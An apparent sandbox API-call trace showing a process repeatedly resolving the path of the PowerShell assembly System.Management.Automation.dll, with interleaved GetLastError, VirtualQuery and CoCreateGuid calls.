	[0162.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.083] GetLastError () returned 0x0
	[0162.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.083] GetLastError () returned 0x0
	[0162.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.083] GetLastError () returned 0x0
	[0162.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.083] GetLastError () returned 0x0
	[0162.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.084] GetLastError () returned 0x0
	[0162.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.084] GetLastError () returned 0x0
	[0162.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.084] GetLastError () returned 0x0
	[0162.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.084] GetLastError () returned 0x0
	[0162.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.084] GetLastError () returned 0x0
	[0162.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.084] GetLastError () returned 0x0
	[0162.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.084] GetLastError () returned 0x0
	[0162.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.084] GetLastError () returned 0x0
	[0162.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.085] GetLastError () returned 0x0
	[0162.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.085] GetLastError () returned 0x0
	[0162.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.085] GetLastError () returned 0x0
	[0162.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.085] GetLastError () returned 0x0
	[0162.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.085] GetLastError () returned 0x0
	[0162.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.085] GetLastError () returned 0x0
	[0162.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.085] GetLastError () returned 0x0
	[0162.086] VirtualQuery (in: lpAddress=0x10cf54, lpBuffer=0x10df54, dwLength=0x1c | out: lpBuffer=0x10df54*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.086] VirtualQuery (in: lpAddress=0x10cf90, lpBuffer=0x10df90, dwLength=0x1c | out: lpBuffer=0x10df90*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.086] GetLastError () returned 0x0
	[0162.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dcf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.087] GetLastError () returned 0x0
	[0162.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dcf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.087] GetLastError () returned 0x0
	[0162.087] VirtualQuery (in: lpAddress=0x10d05c, lpBuffer=0x10e05c, dwLength=0x1c | out: lpBuffer=0x10e05c*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.087] GetLastError () returned 0x0
	[0162.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dcf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.087] GetLastError () returned 0x0
	[0162.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dcf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.088] GetLastError () returned 0x0
	[0162.088] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xd64cfb25, Data2=0x4c, Data3=0x4f4c, Data4=([0]=0xa4, [1]=0x36, [2]=0xaf, [3]=0x83, [4]=0x84, [5]=0xa1, [6]=0x4d, [7]=0x5f))) returned 0x0
	[0162.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.088] GetLastError () returned 0x0
	[0162.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.088] GetLastError () returned 0x0
	[0162.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.088] GetLastError () returned 0x0
	[0162.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.089] GetLastError () returned 0x0
	[0162.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.089] GetLastError () returned 0x0
	[0162.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.089] GetLastError () returned 0x0
	[0162.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.089] GetLastError () returned 0x0
	[0162.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.089] GetLastError () returned 0x0
	[0162.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.090] GetLastError () returned 0x0
	[0162.090] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x248fe7cc, Data2=0xf78e, Data3=0x42e7, Data4=([0]=0x8e, [1]=0xa, [2]=0xb1, [3]=0x4c, [4]=0xff, [5]=0xf0, [6]=0x43, [7]=0xe4))) returned 0x0
	[0162.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.090] GetLastError () returned 0x0
	[0162.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.091] GetLastError () returned 0x0
	[0162.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.091] GetLastError () returned 0x0
	[0162.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.091] GetLastError () returned 0x0
	[0162.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.091] GetLastError () returned 0x0
	[0162.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.091] GetLastError () returned 0x0
	[0162.092] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xbc8423b6, Data2=0xcfe7, Data3=0x4e15, Data4=([0]=0xb7, [1]=0x3c, [2]=0x43, [3]=0xf7, [4]=0x89, [5]=0x6f, [6]=0xc7, [7]=0x65))) returned 0x0
	[0162.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.092] GetLastError () returned 0x0
	[0162.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.092] GetLastError () returned 0x0
	[0162.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.092] GetLastError () returned 0x0
	[0162.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.092] GetLastError () returned 0x0
	[0162.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.093] GetLastError () returned 0x0
	[0162.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.093] GetLastError () returned 0x0
	[0162.093] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xabe3a8fb, Data2=0x2911, Data3=0x428b, Data4=([0]=0xb6, [1]=0xd2, [2]=0x59, [3]=0xf0, [4]=0x28, [5]=0xfe, [6]=0xc4, [7]=0x49))) returned 0x0
	[0162.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.093] GetLastError () returned 0x0
	[0162.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.093] GetLastError () returned 0x0
	[0162.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.094] GetLastError () returned 0x0
	[0162.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.094] GetLastError () returned 0x0
	[0162.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.094] GetLastError () returned 0x0
	[0162.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.094] GetLastError () returned 0x0
	[0162.094] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x89ab82d7, Data2=0x9647, Data3=0x495b, Data4=([0]=0x81, [1]=0x28, [2]=0xd1, [3]=0xe7, [4]=0x68, [5]=0xf5, [6]=0xe6, [7]=0xf3))) returned 0x0
	[0162.095] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x7aafe43f, Data2=0xa1da, Data3=0x4fc0, Data4=([0]=0xa6, [1]=0x86, [2]=0x6, [3]=0x76, [4]=0xfa, [5]=0x30, [6]=0x1f, [7]=0x7d))) returned 0x0
	[0162.095] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xd4ee4663, Data2=0x1a93, Data3=0x4d68, Data4=([0]=0x8f, [1]=0x31, [2]=0x80, [3]=0xdc, [4]=0x59, [5]=0x2d, [6]=0x24, [7]=0xfb))) returned 0x0
	[0162.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.095] GetLastError () returned 0x0
	[0162.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.095] GetLastError () returned 0x0
	[0162.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.095] GetLastError () returned 0x0
	[0162.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
